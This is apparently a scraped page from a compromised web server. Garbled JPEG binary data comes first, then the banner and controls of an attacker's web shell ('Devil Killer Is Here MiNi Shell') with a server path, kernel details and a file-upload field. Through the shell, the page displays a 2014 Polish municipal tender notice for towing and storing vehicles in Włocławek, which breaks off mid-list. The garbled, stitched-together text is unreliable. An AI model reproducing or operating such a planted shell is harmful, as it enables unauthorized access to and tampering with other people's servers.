JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140206/43346-N-2014.html

<p class="kh_header"><b>Włocławek: Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym zgodnie z ustawą Prawo o ruchu drogowym z podziałem na 2 zadania</b><br>
<b>Numer ogłoszenia: 43346 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Włocławek - Urząd Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4144000, faks 54 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym zgodnie z ustawą Prawo o ruchu drogowym z podziałem na 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres usług będących przedmiotem zamówienia wchodzi usuwanie i przechowywanie pojazdów wszystkich typów oraz przekazywanie, na wniosek Zamawiającego, do recyklingu pojazdów porzuconych, usuwanych z dróg leżących na terenie miasta Włocławek w trybie art. 50a i 130a ustawy 
z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (j. t. Dz. U. z 2012 r., poz. 1137 z późn. zm.), zwanej dalej Ustawą, z możliwością składania ofert częściowych na poszczególne zadania:
Zadanie 1 - Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym, zgodnie z ustawą Prawo o ruchu drogowym - wszystkich bez względu na masę całkowitą, z wyłączeniem pojazdów przewożących materiały niebezpieczne.
Zadanie 2 - Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym, zgodnie z ustawą Prawo o ruchu drogowym - wszystkich bez względu na masę całkowitą, przewożących materiały niebezpieczne.

Usunięcie pojazdu z drogi odbywać się będzie zgodnie z zasadami sztuki i przy ścisłym przestrzeganiu zasad bezpieczeństwa i przepisów prawa. Co najmniej będziemy mieli do czynienia z holowaniem, o którym mowa w art. 31 ust. 3 ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (j. t. Dz. U. z 2012 r. poz. 1137 z późn. zm.), zwanej dalej Ustawą, to jest holowaniem pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców (np. gdy unieruchomione są koła pędne i spoczywają na urządzeniu holowniczym). Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań z uwzględnieniem zasady, iż rzeczywista masa całkowita pojazdu holowanego nie może przekraczać rzeczywistej masy całkowitej pojazdu holującego. Przechowywanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym oraz monitorowanym. Pojazdy uszkodzone winny być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie. Parking winien posiadać odpowiednią liczbę miejsc, która pozwoli na swobodne przechowywanie powierzonej liczby pojazdów.
Wykonawca będzie zobowiązany do realizowania przedmiotu zamówienia 24 godziny na dobę, przez 7 dni w tygodniu.
W zakres usługi będącej przedmiotem zamówienia tj. usunięcia i przechowywania pojazdu wchodzi, 
w szczególności:
- dojazd do miejsca zdarzenia w granicach administracyjnych miasta, w celu zrealizowania każdej dyspozycji usunięcia pojazdu oraz bez względu na warunki pogodowe,
- sporządzenie szczegółowej dokumentacji fotograficznej każdego pojazdu aparatem cyfrowym przed jego załadunkiem - co najmniej cztery zdjęcia z każdej strony pojazdu a w przypadku gdy pojazd posiada uszkodzenia - również zdjęcia tych uszkodzeń,
- wyciąganie pojazdu spoza jezdni o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia,
- załadunek, rozładunek oraz inne czynności związane z załadunkiem i wyładunkiem pojazdu,
- uprzątnięcie miejsca zdarzenia z części, przedmiotów i płynów pochodzących z uszkodzonych pojazdów (z wyjątkiem konieczności użycia specjalistycznego sprzętu znajdującego się w pojazdach do tego przystosowanych, np. Straży Pożarnej),
- holowanie (holowanie pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców), przewóz pojazdu na parking Wykonawcy,
- ewentualne odstąpienie od usunięcia pojazdu, na polecenie podmiotu, który wydał dyspozycję usunięcia pojazdu, w przypadku ustania przyczyny jego usunięcia,
- prowadzenie parkingu strzeżonego, na którym będą przechowywane pojazdy,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, 
do dokonywania oględzin na terenie parkingu zabezpieczonego pojazdu,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, kontroli pracy Wykonawcy na każdym jej etapie, w tym warunków przechowywania pojazdów, 
- zabezpieczenie pojazdu i części pojazdu przed jego uszkodzeniem, zniszczeniem, kradzieżą w czasie transportu oraz przechowywania na parkingu a także, w przypadku pojazdów uszkodzonych, zabezpieczenie ich przed działaniem czynników pogodowych,
- przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów,
- informowanie osoby uprawnionej do odbioru pojazdu o wysokości opłat i procedurach związanych z odbiorem pojazdu z parkingu oraz przekazanie mu ulotek informacyjnych i instrukcji postępowania otrzymanych od Zamawiającego, a jeśli Wykonawca posiada stronę internetową, to również umieszczenie na niej ww. ulotek informacyjnych i instrukcji postępowania
- wydanie lub przekazanie pojazdu,
- recykling pojazdu usuniętego w trybie art. 50a Ustawy, po upływie okresu przechowywania, określonego przepisami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do prowadzonego postępowania o udzielenie zamówienia publicznego każdy Wykonawca zobowiązany jest wnieść wadium w kwocie:
1) dla zadania nr I: 4.000,00 złotych,
2) dla zadania nr II: 300,00 złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, iż posiada aktualną licencję na wykonywanie transportu drogowego rzeczy wydanej na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2012 r. poz. 1265 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że dysponuje sprzętem:
a) do usuwania pojazdów o dopuszczalnej masie całkowitej do 3,5 t - co najmniej 2 szt.;
b) do usuwania pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t - co najmniej 1 szt.; spełniającymi wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t. j. Dz. U. z 2013 r., poz. 951 z późn. zm.), oraz:

1) dla Zadania I - wykaże, że dysponuje parkingiem spełniającym następujące wymagania:
- położenie - w granicach administracyjnych miasta,
- liczba miejsc dla pojazdów o d.m.c. do 3,5 t - co najmniej 50,
- liczba miejsc dla pojazdów o d.m.c. powyżej 3,5 t - co najmniej 10,
- rozkład miejsc dla pojazdów umożliwiający ciągły swobodny dostęp do każdego pojazdu,
- parking ogrodzony i oświetlony,
- parking dozorowany przez całą dobę (ochrona fizyczna lub monitoring) oraz zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej,
- parking posiadający wydzielone pomieszczenie w celu przechowywania wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów,

2) dla Zadania II - wykaże i złoży oświadczenie, że dysponuje parkingiem spełniającym wymagania określone w rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13 listopada 2012 r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące towary niebezpieczne (Dz. U. z 2012 roku, poz. 1293).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że posiada opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia, na kwotę co najmniej 250.000,00 zł (słownie: dwieście pięćdziesiąt tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty. 2. Arkusz cenowy. 3. Pełnomocnictwo do podpisania oferty, przedstawione w formie wynikającej z przepisów ustawy z dnia 23 kwietnia 1964 roku - Kodeks Cywilny (Dz. U. z 1964 r., Nr 16, poz. 93 z późn. zm.), tj.: w formie oryginału lub odpisu notarialnego. 4. Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
1) przedłużenie terminu realizacji zamówienia może nastąpić w przypadku wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy 
i administracji publicznej,
2) zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron
3. Zamawiający dopuszcza również możliwość wprowadzania zmian w umowie w stosunku do treści oferty, a także przewiduje możliwość rozwiązania umowy, z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, w szczególności ze względu na zmianę obowiązujących w chwili zawierania umowy przepisów prawa regulujących kwestie związane z przedmiotem zamówienia i mających bezpośredni wpływ na jego realizację.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek, Wydział Inwestycji i Zamówień Publicznych, Zielony Rynek 11/13, 87-800 Włocławek, pokój 25A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 11:00, miejsce: Biuro Obsługi Mieszkańców - holl budynku A, stanowisko ds. obsługi kancelaryjnej Prezydenta Miasta Włocławek, Urząd Miasta Włocławek, Zielony Rynek 11/13, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usuwanie pojazdów z ulic miasta Włocławek oraz ich przechowywanie na parkingu strzeżonym, zgodnie z ustawą Prawo o ruchu drogowym - wszystkich bez względu na masę całkowitą, z wyłączeniem pojazdów przewożących materiały niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres usług będących przedmiotem zamówienia wchodzi usuwanie i przechowywanie pojazdów wszystkich typów oraz przekazywanie, na wniosek Zamawiającego, do recyklingu pojazdów porzuconych, usuwanych z dróg leżących na terenie miasta Włocławek w trybie art. 50a i 130a ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (j. t. Dz. U. z 2012 r., poz. 1137 z późn. zm.), zwanej dalej Ustawą, z możliwością składania ofert częściowych na poszczególne zadania. 
Usunięcie pojazdu z drogi odbywać się będzie zgodnie z zasadami sztuki i przy ścisłym przestrzeganiu zasad bezpieczeństwa i przepisów prawa. Co najmniej będziemy mieli do czynienia z holowaniem, o którym mowa w art. 31 ust. 3 ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym (j. t. Dz. U. z 2012 r. poz. 1137 z późn. zm.), zwanej dalej Ustawą, to jest holowaniem pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców (np. gdy unieruchomione są koła pędne i spoczywają na urządzeniu holowniczym). Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań z uwzględnieniem zasady, iż rzeczywista masa całkowita pojazdu holowanego nie może przekraczać rzeczywistej masy całkowitej pojazdu holującego. Przechowywanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym oraz monitorowanym. Pojazdy uszkodzone winny być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie. Parking winien posiadać odpowiednią liczbę miejsc, która pozwoli na swobodne przechowywanie powierzonej liczby pojazdów. Wykonawca będzie zobowiązany do realizowania przedmiotu zamówienia 24 godziny na dobę, 
przez 7 dni w tygodniu. W zakres usługi będącej przedmiotem zamówienia tj. usunięcia i przechowywania pojazdu wchodzi, w szczególności:
- dojazd do miejsca zdarzenia w granicach administracyjnych miasta, w celu zrealizowania każdej dyspozycji usunięcia pojazdu oraz bez względu na warunki pogodowe,
- sporządzenie szczegółowej dokumentacji fotograficznej każdego pojazdu aparatem cyfrowym przed jego załadunkiem - co najmniej cztery zdjęcia z każdej strony pojazdu a w przypadku gdy pojazd posiada uszkodzenia - również zdjęcia tych uszkodzeń,
- wyciąganie pojazdu spoza jezdni o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia,
- załadunek, rozładunek oraz inne czynności związane z załadunkiem i wyładunkiem pojazdu,
- uprzątnięcie miejsca zdarzenia z części, przedmiotów i płynów pochodzących z uszkodzonych pojazdów (z wyjątkiem konieczności użycia specjalistycznego sprzętu znajdującego się w pojazdach do tego przystosowanych, np. Straży Pożarnej),
- holowanie (holowanie pojazdu w sposób wykluczający potrzebę kierowania nim lub użycia hamulców), przewóz pojazdu na parking Wykonawcy,
- ewentualne odstąpienie od usunięcia pojazdu, na polecenie podmiotu, który wydał dyspozycję usunięcia pojazdu, w przypadku ustania przyczyny jego usunięcia,
- prowadzenie parkingu strzeżonego, na którym będą przechowywane pojazdy,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, 
do dokonywania oględzin na terenie parkingu zabezpieczonego pojazdu,
- umożliwienie osobom upoważnionym, w szczególności przedstawicielom Zamawiającego, kontroli pracy Wykonawcy na każdym jej etapie, w tym warunków przechowywania pojazdów, 
